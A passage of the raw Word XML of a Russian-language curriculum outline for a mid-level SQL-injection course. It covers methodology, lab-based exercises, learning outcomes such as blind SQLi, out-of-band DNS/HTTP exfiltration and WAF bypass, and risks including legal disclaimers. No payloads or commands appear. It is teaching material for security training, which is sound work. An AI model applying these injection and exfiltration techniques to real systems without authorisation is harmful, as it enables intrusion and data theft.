          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Боли:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> «Сканер нашел уязвимость, но я не могу ее проэксплуатировать вручную», «WAF блокирует все стандартные нагрузки».</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5. Методология</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Модель:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Backward Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (от результата к контенту) + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Case-based Learning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Формат:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 20% теории, 80% практики в изолированных лабораториях (Docker-контейнеры).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Активности:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Анализ:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Разбор реальных CVE последних лет.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Синтез:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Написание собственных скриптов на Python для автоматизации Blind-инъекций.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Оценка:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Финальный экзамен в формате «Black Box» (найти и выкачать флаг из защищенной системы).</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6. Сетка результатов (Студент УМЕЕТ)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Идентифицировать точки входа для SQLi в сложных веб-интерфейсах и API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Эксплуатировать Blind SQLi вручную через условные операторы и временные задержки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Извлекать данные через Out-of-band каналы (DNS/HTTP эксфильтрация).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Обходить современные системы фильтрации (WAF/IPS) через манипуляцию синтаксисом.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Проводить аудит кода на наличие уязвимостей внедрения SQL-кода.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Формулировать четкие рекомендации по исправлению (Remediation) для бизнеса.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>7. Риски и ограничения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Юридический риск:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Необходимо четкое предупреждение (Disclaimer) об ответственности. Обучение только на своих/разрешенных стендах.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Динамика ПО:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Версии СУБД обновляются, старые фишки (например, в MySQL 8.0+) могут не работать. Требуется регулярный апдейт лаб.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Инструментарий:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Требуется уточнить, будем ли мы учить работе с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или сознательно исключим его, чтобы сфокусироваться на «ручном» понимании (рекомендуется второй вариант для уровня Middle).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cs="Calibri" w:eastAsia="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="112B6B"/>
      <w:sz w:val="4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cs="Calibri" w:eastAsia="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="112B6B"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FC693F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="280" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="112B6B"/>
      <w:sz w:val="3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